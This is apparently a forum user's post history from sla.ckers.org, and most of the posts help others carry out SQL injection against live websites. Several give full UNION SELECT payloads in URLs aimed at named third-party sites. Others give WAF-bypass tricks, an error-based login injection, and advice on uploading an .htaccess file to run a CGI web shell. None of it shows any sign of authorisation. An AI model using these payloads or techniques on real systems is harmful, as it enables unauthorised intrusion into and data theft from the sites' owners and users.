Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Current Page: 1 of 2
Results 1 - 30 of 50
11 days ago
firestorm
Time based blind.. Maybe. Tell me about the hosting company or website. I am enlisting bypass methods for different hosting providers and firewalls. It can be a simple case of multiple firewalls and maybe you got through mod sec and now you are facing the second firewall. If you find anything interesting mail me : syedsyedafzalin All the best.
Forum: SQL and Code Injection
23 days ago
firestorm
3 cols.
Forum: SQL and Code Injection
5 weeks ago
firestorm
1. It's concat, not conacat 2. replace + with comma before 4 3. 12 from information instead of 12+information_schema 4. bypass more keywords 5. function group_concat does not exist so you can't use it. 6. Illegal mix of collations for operation 'UNION', use unhex to get past that. 7. for what on earth you are injecting an Indian domain ?! http://www.ccrc.in/success_stories.php?id=-1+/*
Forum: SQL and Code Injection
7 weeks ago
firestorm
Hi, while searching for injection points I came across a base64-type looking argument to the id param. Can anyone help me identify what it is exactly and how to decode/encode it? It ain't base64, I tried decoding it. http://u.laaptu.com/login1.action?id=0mYOgRQ6Hqmry/ianstwtUOz5SJOVqi59VoLNz0uwSE=
Forum: Obfuscation
6 months ago
firestorm
You cannot use insert in sqli like that. What is the query you are injecting into? If it's union select, insert won't work with it. MySQL does not allow it. Only if the original query is insert into, or it allows multiple queries to execute, can you insert.
Forum: SQL and Code Injection
7 months ago
firestorm
How did you come to the conclusion that it is mod security? To me it appears to be cloudflare. In either case, good luck.
Forum: SQL and Code Injection
7 months ago
firestorm
Are you a pentester? If you feel like it, share the link with me.
Forum: SQL and Code Injection
8 months ago
firestorm
So, Ajkaro is in great demand these days. ;) Anyways.. Hi, One silly typing mistake you have there. It's information not informaion. Correct it and you'll get : Duplicate entry 'Ciudades y Departamentos~1' for key 'group_key' and for the 1st one (https://www.nivatel.com/static.php?id=9 ).. It's bad news. I suspect that there is a restriction of characters. A limit of 20 chars. id cannot tak
Forum: SQL and Code Injection
8 months ago
firestorm
You're welcome!
Forum: SQL and Code Injection
8 months ago
firestorm
Got ya! hehehe... just kidding :P
Forum: SQL and Code Injection
8 months ago
firestorm
Aj! My dear, you're wrong !! :P
Forum: SQL and Code Injection
8 months ago
firestorm
Why : There is a waf/filter which says Hacking detected! You have been blocked: IP + UA But notice one important thing, why was only your last payload blocked? What special did it have? The keyword 'admin' So how to bypass? Simple, don't use a d m i n . URL Encode it . adminid >> 83 86 88 89 ....so on Simple!
Forum: SQL and Code Injection
9 months ago
firestorm
Nothing... http://www.tonixcomp.net/productDetail.php?Product_ID=-1706+/*!UNION*/+/*!SELECT*/+1,(group_concat(/*!table_name*/)),3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+-
Forum: SQL and Code Injection
9 months ago
firestorm
try some tool.. there was a fast blind injection tool in some conference.. google it.
Forum: SQL and Code Injection
9 months ago
firestorm
same as the previous one. Good finding though.
Forum: SQL and Code Injection
9 months ago
firestorm
Looking at the unusual structure of the query part, on first impression I would say it's a false positive. For HPP you need multiple params in the query part. You got 'step' and 'back' there, but my instincts tell me that they are not connected into one sql query for the attack to work. I might be wrong. You may read about HPP here http://www.andlabs.org/whitepapers/Split_and_Join.pdf Good L
Forum: SQL and Code Injection
10 months ago
firestorm
Indexing is disabled, even acunetix couldn't help. What's left to say ?? Don't they have sitemap xml, anything like that ? Some seo implementations have the sitemap in robots.txt, from there you may get it. Try another crawler, google, bing, search diggity ?
Forum: SQL and Code Injection
10 months ago
firestorm
nice one ajkaro!
Forum: SQL and Code Injection
10 months ago
firestorm
thanks. if there could be more known behaviors of IIS..
Forum: Networking
10 months ago
firestorm
Just as what hack2012 said. Parallels H-Sphere has got an on the folder. Anything not an image is called out 403. Interesting finding . Thank you.
Forum: SQL and Code Injection
10 months ago
firestorm
How to fingerprint IIS? Let's say you cannot trust the server signature sent in the response header (they can be masked) so is there any particular behavior or characteristics ? I attempted to fingerprint by making an HTTP/1.0 HEAD request without host header, here's what I got: IIS <7 400 BAD REQUEST looks like a reliable behavior. IIS>=7 404,301,302 .... and what not!!
Forum: Networking
11 months ago
firestorm
In the user name box : a' and 22=convert(int,@@version)-- You'll get your answer .
Forum: SQL and Code Injection
11 months ago
firestorm
Bad luck. That's only a 7 character window you have there. www.stha.ca/news/index_full.php?id=38++++' => Error Anything beyond 7 is kinda neglected. http://www.stha.ca/news/index_full.php?id=38+++++++' => null or something.. So what can you buy in 7 chars ? www.stha.ca/news/index_full.php?id=38a() => FUNCTION srhb.38a does not exist in..... Just the db name!
Forum: SQL and Code Injection
11 months ago
firestorm
aspx you said! huh easy.. use your brain.
Forum: SQL and Code Injection
11 months ago
firestorm
Things you can try : 1. upload an .htaccess file , from there you can 1. parse jpg or any extension as php . 2. Enable perl or python and upload a cgi shell .. Tell me how it went..
Forum: SQL and Code Injection
1 year ago
firestorm
I noticed that when I make request using gzip encoding the server response has content-length set for me, so I get to know the size without actually having the need to read entire response. Is there any other encoding type for which the server sets content-length in response header ? Thanks!
Forum: Networking
1 year ago
firestorm
Hi, please understand that the part in comments in the query is not even being evaluated. Writing /*!50000 something */ means that the part "something" will only be considered if the version is greater than or equal to 5. Since you mentioned that it's version 4, "something" is being commented out! So better replace 5 with 4 or 3, that should do. Further, t
Forum: SQL and Code Injection
1 year ago
firestorm
This is no waf dear. The result is exciting! The answer of the query is returned as file name! lol!! It's bad, my OS can't manage file names larger than 255 characters. Thinking of it, it's about 4 times less than what group_concat can return!! lol ... Thanks for sharing. I think I'll start collecting "strange sqlis" . Regards
Forum: SQL and Code Injection
1 year ago
firestorm
sqlmap is best, for its high customization and openness. If you like gui more then try netsparker.
Forum: SQL and Code Injection
1 year ago
firestorm
Lucky that magic gpc is not on . It's easy, just complete the where part and comment out the rest. http://www.aeaweb.org/articles.php?doi=10.1257/jel.50.1.51')+union all select 1,2,3,4,5,concat(version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+- Regards
Forum: SQL and Code Injection